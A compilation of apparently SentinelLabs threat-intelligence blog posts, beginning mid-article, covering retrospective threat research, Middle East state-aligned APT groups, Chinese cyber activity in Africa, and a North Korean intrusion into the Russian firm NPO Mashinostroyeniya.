Early last year, SentinelLabs released a report on a new cyber threat actor we named ModifiedElephant. This research was the conclusion of an investigation into an unknown offensive threat actor responsible for targeted attacks on human rights activists, human rights defenders, academics, and lawyers across India with the objective of planting incriminating digital evidence. Our analysis identified that ModifiedElephant has been operating since at least 2012 and continued to operate as of the report.

Timeline sample of ModifiedElephant and SideWinder C2 Infrastructure

So why does this matter? Cyber paleontology allows us to take a small bit of knowledge of targeted intrusions, and expand it into hundreds of indicators of compromise, such as malware samples and unique infrastructure. In the case of ModifiedElephant, we tied the threat actor to hundreds of other intrusion attempts across the globe. This research found activity spread across nearly a decade, targeting individuals and organizations alike.

IOCs have been greatly expanded on, which allow us to improve the defenses of those who were originally targeted, and others who may be targeted in the future. If we simply stopped researching the threat actor based on the initial, smaller, case of a handful of intrusions against individuals, our perception of this actor would remain to be interesting but irrelevant to most. However, visiting a decade back of activity allows us to understand and use actionable intelligence for direct network defense needs.

2. Developing Better Strategic Threat Intelligence

Pushing past directly actionable intelligence such as malware samples, IOCs, and threat detection rules, we can also gain new strategic intelligence on threat actors. Specifically, our perspective of known threat actors can alter greatly when we review past intrusions.

For example, in September we reported and presented at LABScon the topic of China’s soft power agenda throughout Africa. In this research, we shared how Chinese attributed APTs, such as “Backdoor Diplomacy”, have been linked to a previously-reported set of intrusions across South Africa, Kenya, Senegal, and Ethiopia in the past few years.

Revising previously reported infrastructure associated with the threat actor opened our eyes to a wider set of targets in these countries, and a set of targets we have not observed before, including financial organizations. Today, we can use this expanded understanding of the threat actor to apply strategic intelligence for financial organizations and the countries newly observed of interest to the attacker.

Taking a similar approach to others, it would be valuable to dive into high-interest threat actors to question our past assessments and intelligence, aimed at expanding defense capabilities and context today.

3. Enhancing Our Understanding of Attribution

An additional value which can come from a fresh review of historical threat activity concerns attribution – the process of identifying the true attacker behind an activity.

Past intrusions can become clearer based on understanding who the attacking entity actually was, or understanding which threat actor cluster some previously unknown activity may now fall under. For example, in August, we identified malware, with a long history of use by a variety of suspected Chinese clusters, and infrastructure targeting Southeast Asia’s gambling sector related to previous activities attributed to BRONZE STARLIGHT, a Chinese threat actor whose main goal appears to be espionage rather than financial gain.

In addition, we recently reported on the Appin hack-for-hire business in India and how unconfirmed and mysterious activity years back can finally be attributed to them. This includes Operation Hangover, the well known industrial espionage case, and targeting of human rights malware with custom Mac malware.

C2 / Delivery Server bluecreams[.]com and Linked Malware Visualized
C2 / Delivery Server bluecreams[.]com and Linked Malware

Knowing that these sets of activity tie back to a central organization allows renewed understanding and interest in the hack-for-hire threat actor industry. Additionally, and perhaps more importantly, this provides victims with an opportunity to hold attackers responsible for their actions, if desired.

4. Newer Techniques Offer Fresh Insights From Old Data

Using today’s technology to expand past context and knowledge of attackers is also increasingly valuable to modern defenders. The technology sector evolves at a blistering pace, and new research tools often arrive to provide new capabilities.

Although much recent focus has been on adopting and adapting LLMs and generative AI for various infosec tasks, we can also see examples of existing technologies that continue to develop and push the boundaries of what is possible.

One of the best examples of this is YARA— today’s go-to tool for malware description rules used to hunt for various types of files, such as malware or files of high interest. YARA continues to be developed in ways that can yield new discoveries from old datasets. New rule writing methods, combined with major malware repositories such as Stairwell and VirusTotal, can lead to the discovery of leaked attacker files, targeted malware family changes, and uploads of never before seen malware from past attacks.

Combining new discoveries with other tools for tracking infrastructure, like SilentPush, it is possible to make similar high interest discoveries centered around old attacker infrastructure.

Conclusion

As we move forward, it’s important not to lose sight of the past. As many of our research examples highlighted above show, retrospective analyses can wring new actionable intelligence from the raw data of past breaches and help to preempt future attacks.

We encourage other analysts to join us in connecting the dots between what was known, what was overlooked, and what can be learned, taking advantage of the insights that new technologies and methods afford us. Historical data isn’t just an academic record of what went before, but a resource we must mine to craft a more resilient and responsive cybersecurity posture.

Elephant Hunting | Inside an Indian Hack-For-Hire Group

By: Tom Hegel
16 November 2023 at 16:19

Editor’s Note:

SentinelOne has temporarily removed the article “Elephant Hunting | Inside an Indian Hack-For-Hire Group” on Dec 22, 2023 in light of a pending court order and is doing so out of an abundance of caution. SentinelOne stands by its findings and was transparent about the evidence it gathered to support its findings. Those findings were based on many hours of research and verified sources and we are closely following the pending legal action. All rights reserved

The Israel-Hamas War | Cyber Domain State-Sponsored Activity of Interest

By: Tom Hegel
24 October 2023 at 12:54

By Tom Hegel and Aleksandar Milenkoski 

Since the start of the Israel-Hamas war, the cyber domain has played a critical role in the conflict, albeit in ways the world may not have expected. Immediately following the attacks from Hamas on October 7th, social media became a hotbed of disinformation, inaccurate self-described OSINT investigators, and public confusion. Unfortunately, leading social media platforms continue to fail at stopping the spread of disinformation regarding this war. We will continue to see it abused as a go-to method to sway public perception of events with no signs of it ending soon.

However, outside of social media information abuse and opportunistic-hacktivism, we must not forget the likelihood of targeted attacks originating from specific, state-sponsored threat actors. Understanding and closely monitoring all-aspects of the quickly evolving conflict within the digital domain is critical as such targeted attacks will translate into real-world consequences. While we continue to collaborate privately with partners, we also seek to bolster the wider industry knowledge about where to place our efforts.

This is an updated compendium of actors for cybersecurity researchers, analysts, and network defenders to watch closely. These actors have potential for significant involvement as the war continues, including APTs across Hamas, Hezbollah, and Iran-based clusters of activity. While state-sponsored APTs should remain a strong focus, we must also carefully monitor the increasingly common use of hacktivist personas used to cloak state-sponsored operations.

In this post, we share recommended and publicly accessible information in effort to streamline the community’s understanding of relevant actors across historical reports for reference. In addition, we are sharing our perspective of public actor naming overlaps. Please note that each source of public reporting may perform attribution and actor clustering uniquely from their perspective. Nonetheless, these sources should serve as starting points for readers looking to catch up on relevant open-source intelligence for your own defense posturing and analysis needs.

Hamas -Aligned Clusters

Arid Viper

Aliases:

  • APT-C-23
  • Grey Karkadann
  • Desert Falcon
  • Mantis

Description:

Arid Viper is a threat group conducting cyber espionage and information theft operations since at least 2017, predominantly against targets in the Middle East. Based primarily on the geopolitical context of its activities, Arid Viper is suspected to operate on behalf of Hamas with further conclusive information needed to solidify this assessment. For example, the Israeli Defence Forces (IDF) have reported on a campaign targeting soldiers stationed near the Gaza border, which is suspected to be orchestrated by Hamas. This campaign has been separately attributed with medium confidence to Arid Viper based on victimology and similarities with previous activities attributed to this actor such as overlaps in initial infection techniques.

Targeting individuals is a common practice of Arid Viper. This includes pre-selected Palestinian and Israeli high-profile targets as well as broader groups, typically from critical sectors such as defense and government organizations, law enforcement, and political parties or movements. Common initial infection vectors include social engineering and phishing attacks using themed lure documents. The latter often involves establishing rapport with targets over social media, such as Facebook and Instagram, with catfishing being a frequently used technique.

Arid Viper uses a variety of malware as part of its operations, including stagers, backdoors, and mobile spyware applications for the iOS and Android platforms. Arid Viper’s malware is actively maintained and upgraded to meet the group’s operational requirements. This threat actor has consistently demonstrated innovation by adopting new malware development practices across a range of programming and scripting languages, such as Delphi, Go, Python, and C++.

Gaza Cybergang

Aliases:

  • Molerats
  • TA402
  • Gaza Hackers Team
  • Moonlight
  • Extreme Jackal
  • Aluminum Saratoga
  • JEA/Jerusalem Electronic Army (Low to Medium Confidence)

Description:

Gaza Cybergang is a threat actor that has been active since at least 2012. The group primarily targets throughout the Middle East, including Israel and Palestine, while also less-observed in the EU and US. Targeted entities include government, defense, energy, financial, media, technology, telecommunication, and civil society. Current assessment of Gaza Cybergang indicates a medium to high level of confidence in Hamas affiliation.

The group has historically used a variety of custom and publicly available tools in their attacks, showing a notable preference for spear phishing as a method of initial access. They have been known to use malicious documents and email attachments to deliver malware and link lures, and they often deploy implants to maintain persistence on compromised systems. Tools include Molerat Loader, XtremeRAT, SharpStage, DropBook, Spark, Pierogi, PoisonIvy, and many others observed uniquely over the years.

The overall objectives of Gaza Cybergang appear to be primarily intelligence collection and espionage. They seek to gather intelligence, monitor political developments in the region, and support their cause through cyber activities. The group has been active for many years, and their persistence and adaptability in the face of evolving tensions make it a notable actor in the cyber threat landscape moving forward.

Hezbollah-Aligned Clusters

Plaid Rain

Aliases:

  • Aqua Dev 1
  • Polonium

Description:

Plaid Rain is a threat actor first documented in 2022 with a primary focus on targeting entities in Israel across a broad range of verticals, including defense, government, manufacturing, and financial organizations. Plaid Rain is considered to be based in Lebanon, however, its activities indicate potential coordination with Iran-nexus actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Some indicators supporting this assessment include observed overlaps in targeting and TTPs. The potential collaboration between MOIS and Plaid Rain positions this threat group in the nexus of actors that serve as proxies, providing plausible deniability to the government of Iran, such as Cobalt Sapling.

For initial infection, Plaid Rain is suspected to rely primarily on vulnerability exploitation, downstream compromises, and stolen credentials. The group’s arsenal consists of a wide range of well-maintained custom tooling exemplified by the Creepy malware toolset. Plaid Rain’s malware supports a broad range of complementing functionalities following the latest trends in the malware landscape. For example, the CreepyDrive malware uses Cloud services for command and control purposes, likely in an attempt to evade detection by making malicious traffic look legitimate.

Lebanese Cedar

Aliases:

  • Volatile Cedar
  • DeftTorero

Description:

Lebanese Cedar is a lesser-reported APT with a history of successful intrusions across Lebanon, Israel, Palestine, Egypt, United States, United Kingdom, and more. The group was first observed in 2015 and has since maintained limited security industry attention. Similar to Plaid Rain, we associate Lebanese Cedar with Lebanese Shiite militant group Hezbollah attribution as well as potential coordination with Iran-nexus actors affiliated with the Ministry of Intelligence and Security (MOIS).

Initial access methods best observed have been centered around the compromise of victim web servers via n-day vulnerabilities for the deployment of webshells, including ASPXSpy, devilzshell, and Caterpillar. Further use of Meterpreter and their custom Explosive RAT have been associated with objectives around maintaining access through theft of legitimate network credentials, ultimately pursuing espionage objectives.

Relevant Iranian Clusters

Iran hosts a diverse array of state-sponsored threat actors whose activities quickly expand past the specific focus on the Israel-Hamas war. These threat actors exhibit variability in terms of size, capability, and motivation, and they have been responsible for a wide spectrum of cyber operations. While some have clear affiliations with the Iranian government, many Iranian hacktivist personas claim to operate independently. It is crucial to acknowledge that emerging hacktivist collectives may serve as a means to obscure state sponsorship, influencing public opinion and concealing attribution of offensive actions. We strongly recommend that media outlets and industry colleagues exercise caution when publicly disseminating content produced by hacktivist collectives. The propagation of their claims, viewpoints, and actions aligns with an overarching mission, and endorsing these activities contributes to their success.Nonetheless, the diversity and adaptability of Iranian cyber threat actors make them a significant and multifaceted component of the global threat landscape moving forward. As we monitor the evolving situation in the Middle East, it is imperative to focus on Iran as a potential origin of both direct cyber offensive actions and proxy operations supported by Iran-linked groups like Hamas and Hezbollah.

ShroudedSnooper

Aliases:

  • Storm-0861
  • Scarred Manticore

Description:

ShroudedSnooper has been part of multiple recent intrusions across the Middle East, including Israel within the past two months, and elsewhere since at least 2020. Most recent observations and activity we can confirm, center around intrusions across the telecommunication and government sectors. The group is attributed to Iran’s Ministry of Intelligence and Security (MOIS).

Our current understanding of the group is that they operate for intelligence collection and initial access to other MOIS entities. Initial access methods for ShroudedSnooper have, and potentially continue to be, accomplished through the compromise of publicly accessible web servers via n-day vulnerabilities. As observed in the recent Israeli telecom intrusions, the group has then made use of backdoors mimicking enterprise security software.

Cobalt Sapling

Aliases:

  • Moses Staff
  • Abraham’s Ax
  • Marigold Sandstorm

Description:

‘Moses Staff’ and ‘Abraham’s Ax’ are hacktivist personas known for their anti-Israel rhetoric,  disruptive and data exfiltration attacks, and penchant for leaking stolen data online along with propaganda content in the form of videos or imagery. Moses Staff and Abraham’s Ax are potentially distinct groups. Since the emergence of Moses Staff in 2021 and Abraham’s Ax in 2022 proclaiming allegiance with Hezbollah, the groups have continued to separately maintain their online presence. However, they share iconography, content editing and infrastructure management practices. This, and the alignment of their activities with the geopolitical interests of Iran, suggests that the two groups are likely part of a single cluster (also referred to as Cobalt Sapling) and serve as proxy groups providing plausible deniability to Iran.

Moses Staff has traditionally focused its efforts on business and government organizations primarily within Israel. In contrast, Abraham’s Ax has asserted responsibility for attacks on entities located outside of Israel but with geopolitical relevance to the country. For example, the alleged intrusions into Saudi Arabian government entities by Abraham’s Ax may have been an attempt to counter the normalization of relations between Israel and Saudi Arabia previously conditioned by resolving the Israeli-Palestinian issue.

Although the threat intelligence research community has identified custom offensive tooling observed in Moses Staff attacks, such as StrifeWater, PyDCrypt and DCSrv, we do not exclude the possibility of Moses Staff and Abraham’s Ax sharing tooling and operational practices making accurate clustering challenging at this time. Operations attributed to Moses Staff have involved RATs and ransomware with no indications of financial motivations, but rather disruption, destruction, and concealment of cyber espionage activities.

APPENDIX: Recommended Public Reporting

Arid Viper

Gaza Cybergang

Plaid Rain

Lebanese Cedar

ShroudedSnooper

Cobalt Sapling

Cyber Soft Power | China’s Continental Takeover

By: Tom Hegel
21 September 2023 at 17:00

Executive Summary

  • SentinelLabs observes sustained tasking towards strategic intrusions by Chinese threat actors in Africa, designed to extend influence throughout the continent.
  • New attacks include those against telecommunication, finance and government, attributed to the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love.
  • China’s engagement in soft power diplomacy has a lengthy history, yet the use of strategic cyber intrusions highlights recent objectives and potential lasting impact in Africa.
  • To better manage the challenge of tracking state-aligned cyber activities in less monitored areas like Africa and Latin America, we are announcing the formation of the ‘Undermonitored Regions Working Group’. Launched today at LABScon, this effort calls upon established security researchers to join analytic capabilities, combine telemetry, resources, and local expertise, and promote a unified approach to analyzing cyber operations used to support soft power agendas in Africa and Latin America.

Introduction

In the evolving cyber threat landscape, it’s always important to constantly challenge our biases. There are large pockets of important threat activity occurring in regions around the world less commonly addressed in Western threat research. While much attention has rightfully been drawn to Chinese threat actors targeting the West, the broader set of global activity supporting and promoting similar interests remains opaque. At a time of pervasive foreign activities towards cornering natural resources and co-opting the governance of less represented countries, we have to ask– what is happening across the vast African continent?

As we contemplate where China might stand in the global arena in the next 5 to 10 years, it’s evident that there exists a considerable gap in the realm of cyber threat intelligence with regards to Africa as a whole, and more specifically how it ties into the long term agenda of the People’s Republic of China (PRC). Africa, with its highly complex and dynamic environment, poses a unique challenge for accurately characterizing its cyber threat landscape.

In the threat intelligence industry, we have a habit of overlooking regions where our immediate financial interests don’t appear to be at stake. Yet, it is precisely in places like Africa and Latin America that we witness these threat actors subtly shifting the balance of negotiations and playing pivotal roles in larger geopolitical strategies. There’s an urgent need to acknowledge the importance of these frequently overlooked regions in the global threat landscape and take radical steps to close the gap in our situational awareness. These regions are shaping up to be the battlegrounds of the future.

Our focus is on incentivizing strategic intelligence on the state of cyber operations targeting Africa. We recognize that these operations need to be placed in the greater context of multidimensional campaigns that include more traditional forms of espionage, market maneuvers, and influence. This is vital in understanding the PRC’s geostrategic ambitions and technological investments, and are fundamental in forging a forward-thinking and holistic defense approach. We’ll highlight key examples including the targeting from Chinese state-sponsored APTs, such as Op. Tainted Love and BackdoorDiplomacy, and how they blend into PRC’s soft power agenda across Africa.

Background on Soft Power Engagement

While cyber capabilities are important, they are just one of the more recent tools used in implementing broad national soft power strategies. Spanning several decades, China’s involvement in the continent has adapted to embrace economic, political, and cultural dimensions that represent both comprehensive and strategic opportunities. The establishment of Confucius Institutes and expanding media investments have been a tool in crafting narratives that underline the positive aspects of its engagement in Africa.

China has engaged in significant strategic investments in Africa, considered ‘debt-trap diplomacy’. This refers to a scenario where a creditor country extends excessive credit to a debtor country with the presumed intention of extracting economic or political concessions when the debtor country cannot meet its repayment terms.

Specifically in Africa, China has financed large critical infrastructure projects in many African countries. Countries pursuing economic and infrastructure development have found China a willing and eager investor over the last decade. Future adverse effects are easily brushed aside by the immediate perceived benefits of these investments.

Offensive Cyber Operations as a Support Tool of Soft Power Agendas

In recent years, we have tracked targeted intrusions against key industrial sectors in various African nations. These attacks conspicuously align with China’s broader soft power and technological agenda in the region, focusing on critical areas such as the telecommunication sector, financial institutions, and governmental bodies. Three significant sets of activity best exemplify this dynamic across the larger set of China-aligned activity in Africa.

Operation Tainted Love

In March 2023, we shared details of Operation Tainted Love, a case centered on targeted attacks against telecommunications providers predominantly located in the Greater Middle East region. This discovery marked an evolution of the toolkit involved in Operation Soft Cell, forging immediate connections to previous China-attributed activities.

From Operation Tainted Love, we highlighted the use of a rigorously maintained and version-controlled system for credential theft, accompanied by a novel dropper mechanism. The overall findings are suggestive of a concerted development effort undertaken by a threat actor, or threat actors support structure, driven by specific objectives.

Operation Tainted Love

Unnoted in our initial report, we identified the compromise of a telecommunications entity based in North Africa by the same threat actor. The timing of this activity aligned closely with Chinese telecommunication soft power interests in Africa, as the organization was in private negotiations for further regional expansion in areas. Strategic objectives in such intrusions highlight interest from China in internal business knowledge on negotiations, providing competitive advantage, or prepositioning for retained technical access for intelligence collection.

Backdoor Diplomacy

For several years, another APT primarily referred to as BackdoorDiplomacy has operated across Africa. Recently, fresh revelations emerged spotlighting the group’s sustained three-year endeavor targeting governmental organizations in Kenya. Delving into prior public technical reports by ESET, Unit42, and BitDefender unveils a targeting paradigm bearing resemblance to those employed in Operation Tainted Love.

BackdoorDiplomacy seemingly concentrates efforts on government entities, along with high-priority telecommunications and finance organizations. The group has orchestrated a series of notable espionage campaigns across Africa in recent years. Through analysis of infrastructure tied to this actor, we assess multiple African countries are experiencing targeting over the last few years, including at least South Africa, Kenya, Senegal, and Ethiopia. As noted by previous reporting, the threat actor does maintain operations throughout the middle east, and can be found in other regions of particular PRC interest.

Our current perspective suggests a close relationship between BackdoorDiplomacy and another Chinese state sponsored threat actor, APT15.

Threat Actors Ambiguity

A broader set of China-aligned campaigns has been active across Africa, as emphasized by recent reports on FamousSparrow and Earth Estries. Pinpointing precise clustering for these groups remains challenging due to a prevalence of shared technical resources. However, TTPs and targeting objectives are somewhat related to the APT41 umbrella.

In a separate case, Chinese espionage efforts against the African Union (AU) was allegedly discovered in 2017. According to initial reports, for a period of five years, from 2012 to 2017, the Chinese government maintained backdoor access into servers for the African Union’s headquarters in Ethiopia. The $200 million dollar headquarters was funded and built by China between 2009 and 2012. Notably, the network infrastructure and services were reportedly Huawei technology since the initial construction.

African Union Headquarters, Addis Ababa

More recently in 2020, Japan’s CERT notified AU IT staff of an intrusion they attributed to the Bronze President APT, a separately tracked Chinese threat actor. In this intrusion, Bronze President was observed exfiltrating surveillance footage from the AU headquarters facility. This case may highlight how much of a real priority intelligence inside the AU is to Beijing, ultimately forcing their hand on moving away from backdoored equipment to performing actual intrusions through well tracked APTs.

In both the 2017 and 2020 case, African Union and Chinese officials denied any sort of intrusions. As quoted by Reuters, a former AU official told them “Attacking the Chinese, for us, it’s a very bad idea,”. A review of specifics around China’s technological soft power in Africa highlights some reasons why the official may have said that.

Technological Soft Power, Reliance, and Abuse Opportunities

The digital landscape of Africa has undergone a seismic transformation, largely facilitated through Chinese tech giants deploying extensive resources to meet the continent’s critical technological needs.

China has taken a lead role in Africa’s telecommunication, finance, and surveillance technology sectors. This initiative ties into China’s Digital Silk Road project, announced in 2015.

Telecommunication Networks

At the forefront of technology investment in Africa are Huawei and ZTE, powerhouses steering efforts to bridge the connectivity divide separating urban and rural landscapes of the continent. These corporations have brought the boon of digital connectivity to the remotest corners of Africa.

In the two decades since Huawei began expanding into Africa, it has grown to become the leading telecommunication technology and service provider across much of the continent.

Yet, underneath the altruistic veneer may lie a strategy anchored on fostering an overwhelming dependence on Chinese technology. Through a sweeping range of initiatives that span from mobile networks to broadband infrastructure, the strategy envisions a society deeply tied to China’s digital ecosystem, guiding future socio-political paths and holding significant sway over personal freedoms.

This rise isn’t merely a route to economic enrichment; it empowers China to shape policies and narratives aligned with its geostrategic ambitions, establishing itself as a pivotal and defining force in Africa’s digital evolution.Targeted intrusions by the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love indicate a level intention directed at supporting such agendas.

Instances of infringement on internet rights and the misuse of technology are already evident in countries such as Sudan, Ethiopia, Zimbabwe, Gabon, and the Democratic Republic of Congo. In some of these nations, the governments have resorted to shutting down social media and internet services as a strategy to suppress civil unrest, or even spying on the network communications of its citizens.

China has also ventured to enhance its command over the underwater fiber networks connected to the African continent. Leveraging significant investments in projects such as the PEACE cable initiative, China has been laying cables that aim to rejuvenate Africa’s digital connectivity, ostensibly offering the continent much needed information accessibility.

Peace Cable Map, TeleGeography
Peace Cable Map, TeleGeography

These underwater pathways hold enormous significance in dictating the flow of information between continents. In taking ownership of them, China stands in a position to potentially orchestrate and steer digital dialogues on the African continent, forging a narrative that aligns seamlessly with its geopolitical objectives.

Controlling these undersea networks gives China the capacity to monitor the data flowing through them, raising serious concerns regarding data privacy and national sovereignty. To gauge the potential for misuse, we only need to examine how China manages its own domestic networks, offering a window into the possible ramifications of granting them such control.

Mobile Payment Platforms

In recent years, digital mobile banking platforms like M-Pesa have revolutionized Africa’s financial landscape, promoting unprecedented financial inclusion especially in areas underserved by traditional banks. With 51 million users processing over $314 billion in transactions annually, its footprint is substantial.

M-Pesa has since been migrated to Huawei’s Mobile Money Platform. Similarly, China-backed entities OPay and PalmPay have seized a considerable market share, facilitating a large portion of the continent’s financial transactions.

This should raise apprehensions around the nature of China’s influence, with potential avenues for financial monopolies and the control it gives to Chinese stakeholders in the dictation of economic trajectories across the African continent.

The intensive data mining, user surveillance, and user disruption that are characteristic of Chinese tech giants present a significant risk of exploitation, infringing upon the privacy rights of individuals and potentially undermining the sovereignty of African nations. The depth and breadth of data these platforms can amass and control raise serious concerns about how it might be utilized, perhaps to shape consumer behavior, influence public opinion, or even foster dependencies that go beyond financial transactions.

While services offered by these platforms are undeniably bringing about a financial revolution, it’s creating a scenario where a foreign power has an overwhelming influence over the financial stability, habits, and preferences of a significant portion of the African populace. Financial inclusion and potential manipulation hang in a precarious balance, necessitating a critical appraisal of the long-term implications of this growing influence.

Surveillance

Huawei’s Smart City venture is also emerging as a central pillar in China’s escalating soft power influence in Africa. This initiative pivots on a suite of surveillance services including facial recognition, artificial intelligence, data analytics, and 5G network deployments, all purportedly claimed to enhance urban management, augment public safety, and spur economic development. Yet, the flipside of this technological investment is the possibility of a surveillance era of unparalleled scope, exploiting a diverse array of data from daily life to cultivate a society where personal privacy could soon become obsolete.

Across Africa, nations like Kenya, Mauritius, Uganda, and Zambia have embraced Huawei, infusing surveillance technology into the heartbeat of their urban landscapes. In Kenya, the Safe City project — powered by Huawei’s system encompassing CCTV and facial recognition technologies — monitors Nairobi and other primary cities. In Uganda, one such case of surveillance reportedly led to the regime seeking to silence political opponent Bobi Wine, accomplished through the help of Huawei staff and services. These same capabilities can be found in many other countries throughout Africa.

Bobi Wine, source: Bloomberg
Bobi Wine, source: Bloomberg

Other noteworthy activity includes the Chinese business CloudWalk Technology providing facial recognition surveillance technology to Zimbabwe. CloudWalk has been accused of being involved in human rights violations and transgressions perpetrated during China’s campaign targeting Uighurs, ethnic Kazakhs, and other Muslim minority groups in the Xinjiang Uighur Autonomous Region. This campaign is characterized by widespread repression, indiscriminate detentions, enforced labor, and intensive high-tech surveillance.

Once these smart cities come to fruition, they will operate fundamentally on Chinese technology, often granting Beijing real-time insights into these nations, lacking consequences for personal privacy and national safeguarding measures. Moreover, these nations steer towards further reliance on Chinese expertise and technical resources for the use and administration of these systems into the future.

A Force for Good

African nations face the delicate task of leveraging Chinese tech innovations while preserving their autonomy and digital rights, a tightrope walk exacerbated by limited alternatives. Concurrently, it’s imperative for the cybersecurity community to deepen our understanding of China’s cyber activities in Africa to prevent unwanted encroachment.

Due to escalating cyber threats in overlooked areas such as Africa and Latin America, we are launching the Undermonitored Regions Working Group (URWG). This initiative is focused on addressing the unique cybersecurity hurdles faced in these regions, frequently sidelined in mainstream global cyber discussions.

Our mission transcends geographical boundaries as we track state-sponsored threats emerging globally from nations be it China, Russia, or Egypt. We are determined to cultivate a technical research collaboration, harnessing our collective expertise to identify new threats, and devise effective countermeasures against them.

SentinelLabs embodies our commitment to sharing openly – providing tools, context, and insights to strengthen our collective mission of a safer digital life for all. We are seeking out security researchers, intelligence analysts, and those passionate about understanding and improving the cyber threat narrative to grow these efforts through unconventional means. By pooling our knowledge and technical prowess, we strive to nurture a digital future in support of less monitored parts of the world.

Conclusion

As we have navigated through the complexities of Chinese influence in Africa, the role of offensive cyber actions, and the broader implications of tech dominance, it becomes evident that this intricate web of geopolitics and cyber threats demands attention across the cybersecurity industry.

Recognizing Africa’s centrality in the future of global cyber dynamics helps not only the safeguarding of the continent’s digital freedoms but fortifies the global ecosystem against sophisticated threat actors.

The story of Africa’s digital landscape today is, in essence, the precursor to the global narrative of tomorrow. We should work in tandem to craft it as one of security, prosperity, and shared progress.

Comrades in Arms? | North Korea Compromises Sanctioned Russian Missile Engineering Company

By: Tom Hegel
7 August 2023 at 09:58

By Tom Hegel and Aleksandar Milenkoski 

Executive Summary

  • SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya.
  • Our findings identify two instances of North Korea related compromise of sensitive internal IT infrastructure within this same Russian DIB organization, including a specific email server, alongside use of a Windows backdoor dubbed OpenCarrot.
  • Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
  • At this time, we cannot determine the potential nature of the relationship between the two threat actors. We acknowledge a potential sharing relationship between the two DPRK-affiliated threat actors as well as the possibility that tasking deemed this target important enough to assign to multiple independent threat actors.

Background

North Korean threat actors have caught our attention over the past year, providing us with fruitful insight into a variety of campaigns, such as new reconnaissance tools, (multiple) new supply chain intrusions, elusive multi-platform targeting, and new sly social engineering tactics. To add to that list, let’s take a look at an intrusion into what might be considered a highly desirable strategic espionage mission – supporting North Korea’s contentious missile program.

The Target Organization

While conducting our usual hunting and tracking of suspected-North Korean threat actors, we identified a leaked email collection containing an implant with characteristics related to previously reported DPRK-affiliated threat actor campaigns. A thorough investigation of the email archive revealed a larger intrusion, not fully recognized at the time by the compromised organization.

The victim organization is NPO Mashinostroyeniya (JSC MIC Mashinostroyenia, NPO Mash), a leading Russian manufacturer of missiles and military spacecraft. The organization’s parent company is JSC Tactical Missiles Corporation KTRV (Russian: АО «Корпорация Тактическое Ракетное Вооружение», КТРВ). NPO Mashinostroyeniya is a sanctioned entity that possesses highly confidential intellectual property on sensitive missile technology currently in use and under development for the Russian military.

We are highly confident that the emails related to this activity originate from the victim organization. Furthermore, there are no discernible signs of manipulation or technically verifiable inaccuracies present in these emails. It’s essential to highlight that the leaked data comprises a substantial volume of emails unrelated to our current research scope. This suggests that the leak was likely accidental or resulted from activity unrelated to the specific intrusion under scrutiny in our investigation. However, this collection provides valuable background context for our understanding of their internal network design, security gaps, and even cases of activity by other attackers.

Example of unrelated email alerts from Russian CERT to NPO Mash
Example of unrelated email alerts from Russian CERT to NPO Mash

In mid-May 2022, roughly a week prior to Russia vetoing a U.N. resolution to impose new sanctions on North Korea for intercontinental ballistic missile launches that could deliver nuclear weapons, the victim organization internally flagged the intrusion. Internal NPO Mashinostroyeniya emails show IT staff exchanged discussions highlighting questionable communications between specific processes and unknown external infrastructure. The same day, the NPO Mashinostroyeniya staff also identified a suspicious DLL file present in different internal systems. The month following the intrusion, NPO Mashinostroyeniya engaged with their AV solution’s support staff to determine why this and other activity was not detected.

Following an examination of the emails and an in-depth investigation into the two separate sets of suspicious activity, we have successfully established a correlation between each cluster of activity and a respective threat actor amounting to a more significant network intrusion than the victim organization realized.

North Korean Overlap

During our investigation, we identified the suspicious file in question to be a version of the OpenCarrot Windows OS backdoor, previously identified by IBM XForce as part of Lazarus group activities. As a feature-rich, configurable, and versatile backdoor, the malware is a strong enabler of the group’s operations. With a wide range of supported functionality, OpenCarrot enables full compromise of infected machines, as well as the coordination of multiple infections across a local network. The OpenCarrot variant we analyzed supports proxying C2 communication through the internal network hosts and directly to the external server, which supports the strong possibility of a network-wide compromise.

Additionally, we discovered the suspicious network traffic discussed in emails is the compromise of the business’ Linux email server, hosted publicly at vpk.npomash[.]ru (185.24.244[.]11). At time of discovery, the email server was beaconing outbound to infrastructure we now attribute to the ScarCruft threat actor. ScarCruft is commonly attributed to North Korea’s state-sponsored activity, targeting high value individuals and organizations near-globally. The group is also referred to as Inky Squid, APT37, or Group123, and often showcases a variety of technical capabilities for their intrusions. While we are unable to confirm the initial access method and implant running on the email server at time of discovery, we link malware loading tools and techniques involving this set of infrastructure to those seen in previously reported ScarCruft activity using the RokRAT backdoor.

This intrusion gives rare insight into sensitive DPRK cyberespionage campaigns, and an opportunity to expand our understanding of the relationship and goals between various North Korean cyber threat actors. It also highlights a potential rift in relations between Russia and North Korea, considering their growing relationship.

This engagement establishes connections between two distinct DPRK-affiliated threat actors, suggesting the potential for shared resources, infrastructure, implants, or access to victim networks. Moreover, we acknowledge the possibility that the assigned task of an intrusion into NPO Mashinostroyeniya might have warranted targeting by multiple autonomous threat actors due to its perceived significance.

OpenCarrot Backdoor Activity

The OpenCarrot sample we analyzed is implemented as a Windows service DLL file, intended to execute in a persistent manner. In line with typical practices of the Lazarus group, OpenCarrot is subject to continuous, not necessarily incremental, changes. The file has a compilation timestamp of Wednesday, Dec. 01, 2021. Although the timestamp could have been manipulated by the threat actors, given the proximity to the May 2022 suspected intrusion date, it’s likely that the timestamp is authentic. Our confidence in this assessment also increases through the infrastructure analysis below.

The OpenCarrot variant we analyzed implements over 25 backdoor commands with a wide range of functionality representative of Lazarus group backdoors.  In this case, supported functionality includes:

  • Reconnaissance: File and process attribute enumeration, scanning and ICMP-pinging hosts in IP ranges for open TCP ports and availability.
  • Filesystem and process manipulation: Process termination, DLL injection, and file deletion, renaming, and timestomping.
  • Reconfiguration and connectivity: Managing C2 communications, including terminating existing and establishing new comms channels, changing malware configuration data stored on the filesystem, and proxying network connections.

The OpenCarrot sample displays further characteristics often seen among Lazarus Group malware.

Its backdoor commands are indexed by consecutive integers, a common trait of Lazarus group malware. In addition to integer-indexed commands, the developers implement string-indexed sub-commands.

Backdoor command indexing
Backdoor command indexing

Keeping with their typical mode of operations, the malware is intended to execute as a Windows service and exports the ServiceMain function.

